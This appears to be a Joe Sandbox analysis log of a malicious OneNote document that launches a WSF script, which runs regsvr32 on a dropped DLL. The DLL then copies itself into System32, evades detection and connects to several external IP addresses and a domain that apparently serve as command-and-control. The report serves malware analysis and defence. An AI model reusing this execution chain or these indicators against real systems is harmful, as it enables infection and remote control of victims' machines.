Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5610C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F492F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F596D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5EAC0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4D6CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F43ABC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5A6BC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4AAB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F44EB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4BE90
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F54A90
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F48A8C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F64E8C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F43274
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F50A70
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4A660
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4F65C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4B258
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5A244
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4BA2C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F58A2C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F50E2C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5662C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F44214
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4461C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F55A00
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F68A00
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F43E0C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5020C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F58E08
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4A7F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F627EC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F42FD4
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F433D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F53FD0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F597CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F48FB0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4FFB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F58BB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4DBA0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F41B94
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F55384
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5D770
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5CF70
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4F77C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F48378
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5E750
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4975C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F44758
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4D33C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4EF14
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F53B14
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5E310
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F54F18
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_01210000
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B276A8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B30618
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B16E42
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B373A4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B163F4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B23FD0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B18BC8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B28FC8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B19B79
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B208CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1CC14
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1640A
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B17D6C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B32AB0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1AAB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B14EB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B13ABC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2A6BC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1BE90
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B24A90
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B32E84
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B18A8C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B34E8C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B192F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B336FC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B296D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2EAC0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1D6CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1263C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1BA2C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B28A2C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B20E2C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2662C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B14214
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1461C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B25A00
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B38A00
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B28E08
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B13E0C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2020C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B20A70
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B13274
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1A660
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1B258
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1F65C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2A244
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B36E48
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B18FB0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1FFB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B28BB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1DBA0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B347A8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B11B94
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B25384
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1A7F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2FFFC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B327EC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B12FD4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B133D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B297CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1D33C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2E310
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B38310
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1EF14
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B23B14
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B24F18
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B35B1C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2D770
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2CF70
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B18378
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1F77C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B38B68
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2E750
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B14758
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1975C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2A8B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1DCB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B394BC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B344A8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B198AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1AC94
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B31494
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2709C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B25880
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B14C84
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2CC84
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B3488C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B13CF4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B190F8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B148FC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B220E0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B114D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B23CD4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B31CD4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B118DC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1F8C4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B25CC4
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B180CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B21030
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2EC30
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1B83C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B17410
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B3181C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B11000
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2A000
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B19408
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B17C08
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B26C70
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1D474
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B12C78
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1C078
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B1B07C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2B460
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B35868
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B35450
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2C058
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B17840
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2C44C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B195BC
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2BDA0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2D5F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B215C8
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2B130
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B16138
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B24D20
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B21924
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2AD28
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B39910
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B27518
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B38500
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B32100
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B2610C
Source: C:\Windows\System32\regsvr32.exe | Code function: 12_2_02B34D64
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
Source: Insight_Medical_Publishing_3.one | ReversingLabs: Detection: 30%
Source: Insight_Medical_Publishing_3.one | Virustotal: Detection: 41%
Source: C:\Windows\SysWOW64\wscript.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_3.one
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll"
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll"
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll"Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{FEEE3FA4-F7B3-4CCE-AC94-72B79C0B1135}Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{1A5C047D-3D28-4AA6-A11A-87D0AFF6CFBA} - OProcSessId.datJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winONE@9/11@1/49
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F48BC8 Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,11_2_00F48BC8
              Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
              Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
              Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
              Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_0000000180005C69 push rdi; ret 11_2_0000000180005C72
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00000001800056DD push rdi; ret 11_2_00000001800056E4
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F4A0FC push ebp; iretd 11_2_00F4A0FD
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F580D7 push ebp; retf 11_2_00F580D8
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F46CDE push esi; iretd 11_2_00F46CDF
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F46C9F pushad ; ret 11_2_00F46CAA
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F4A1D2 push ebp; iretd 11_2_00F4A1D3
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F57987 push ebp; iretd 11_2_00F5798F
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F58157 push ebp; retf 11_2_00F58158
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F49D51 push ebp; retf 11_2_00F49D5A
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F57D4E push ebp; iretd 11_2_00F57D4F
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F57D3C push ebp; retf 11_2_00F57D3D
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F57D25 push 4D8BFFFFh; retf 11_2_00F57D2A
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F57EAF push 458BCC5Ah; retf 11_2_00F57EBC
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F49E8B push eax; retf 11_2_00F49E8E
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F4A26E push ebp; ret 11_2_00F4A26F
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00F5C731 push esi; iretd 11_2_00F5C732
              Source: C:\Windows\System32\regsvr32.exe Code function: 12_2_02B2C731 push esi; iretd 12_2_02B2C732
              Source: C:\Windows\System32\regsvr32.exe Code function: 12_2_02B16C9F pushad ; ret 12_2_02B16CAA
              Source: C:\Windows\System32\regsvr32.exe Code function: 12_2_02B16CDE push esi; iretd 12_2_02B16CDF
              Source: C:\Windows\System32\regsvr32.exe Code function: 12_2_02B36D34 push edi; ret 12_2_02B36D36
              Source: rad38C2A.tmp.dll.9.dr Static PE information: section name: _RDATA
              Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll
              Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll
              Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy)
              Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy)

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll:Zone.Identifier read attributes | delete
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe TID: 4956 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\regsvr32.exe TID: 1540 Thread sleep time: -270000s >= -30000s
              Source: C:\Windows\System32\regsvr32.exe API coverage: 8.0 %
              Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_0000000180008D28 FindFirstFileExW
              Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
              Source: regsvr32.exe, 0000000C.00000003.451113819.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0P/
              Source: wscript.exe, 00000009.00000002.353992148.00000000053FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
              Source: wscript.exe, 00000009.00000003.349954279.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351723775.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354073376.0000000005423000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.424429920.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480911858.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451649748.00000000012F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000009.00000002.353992148.00000000053FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: regsvr32.exe, 0000000C.00000003.424429920.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480911858.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451649748.00000000012F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_000000018000A878 GetProcessHeap
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\regsvr32.exe Network Connect: 164.90.222.65 443
              Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 203.26.41.131 443
              Source: C:\Windows\SysWOW64\wscript.exe Domain query: penshorn.org
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 66.228.32.31 7080
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 187.63.160.88 80
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 104.168.155.143 8080
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 159.89.202.34 443
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 91.121.146.47 8080
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 160.16.142.56 8080
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 167.172.199.165 8080
              Source: C:\Windows\System32\regsvr32.exe Network Connect: 163.44.196.120 8080
              Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll
              Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_00000001800070A0 cpuid
              Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

              Stealing of Sensitive Information

              Source: Yara match File source: Insight_Medical_Publishing_3.one, type: SAMPLE
              Source: Yara match File source: 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 12.2.regsvr32.exe.1220000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 12.2.regsvr32.exe.1220000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 11.2.regsvr32.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 11.2.regsvr32.exe.f10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000002.579427861.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000B.00000002.334703858.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara match File source: Insight_Medical_Publishing_3.one, type: SAMPLE
